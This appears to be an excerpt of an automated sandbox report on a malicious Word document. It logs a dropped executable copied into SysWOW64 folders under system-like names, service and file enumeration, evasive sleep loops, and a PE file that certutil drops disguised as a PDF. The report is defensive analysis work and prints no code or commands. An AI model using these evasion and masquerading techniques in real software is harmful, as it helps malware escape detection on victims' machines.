Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: sample1.doc

Stream path 'Data' entropy: 7.97862280177 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to enumerate running services

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: ChangeServiceConfig2W,OpenServiceW,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	8_2_00645040
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	9_2_003F5040
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	10_2_003F5040
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	11_2_00335040
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	12_2_004F5040
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	13_2_00295040
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	14_2_01C65040
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	15_2_003F5040

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Window / User API: threadDelayed 9764	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Window / User API: threadDelayed 9750	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Window / User API: threadDelayed 9710	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Window / User API: threadDelayed 401	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Window / User API: threadDelayed 9599	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Window / User API: threadDelayed 9865	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Window / User API: threadDelayed 9742	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Window / User API: threadDelayed 9919	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Window / User API: threadDelayed 9476	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Window / User API: threadDelayed 9833	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\certutil.exe

Dropped PE file which has not been started: C:\Users\Public\Ksh1.pdf

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe TID: 2488	Thread sleep count: 250 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe TID: 2488	Thread sleep count: 9750 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe TID: 1784	Thread sleep count: 290 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe TID: 1784	Thread sleep count: 9710 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe TID: 2648	Thread sleep count: 401 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe TID: 2648	Thread sleep count: 9599 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe TID: 3020	Thread sleep count: 135 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe TID: 3020	Thread sleep count: 9865 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe TID: 2812	Thread sleep count: 9742 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe TID: 2812	Thread sleep count: 258 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe TID: 2836	Thread sleep count: 9919 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe TID: 2836	Thread sleep count: 81 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe TID: 2632	Thread sleep count: 9476 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe TID: 2632	Thread sleep count: 237 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe TID: 1068	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe TID: 1572	Thread sleep count: 167 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe TID: 1572	Thread sleep count: 9833 > 30	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_006438F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	8_2_006438F0
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	9_2_003F38F0
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	10_2_003F38F0
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_003338F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	11_2_003338F0
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	12_2_004F38F0
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_002938F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	13_2_002938F0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C638F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	14_2_01C638F0
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	15_2_003F38F0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_004738F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	16_2_004738F0

Source: dhcpcmonitor.exe, 0000000C.00000002.2273855343.000000000030F000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
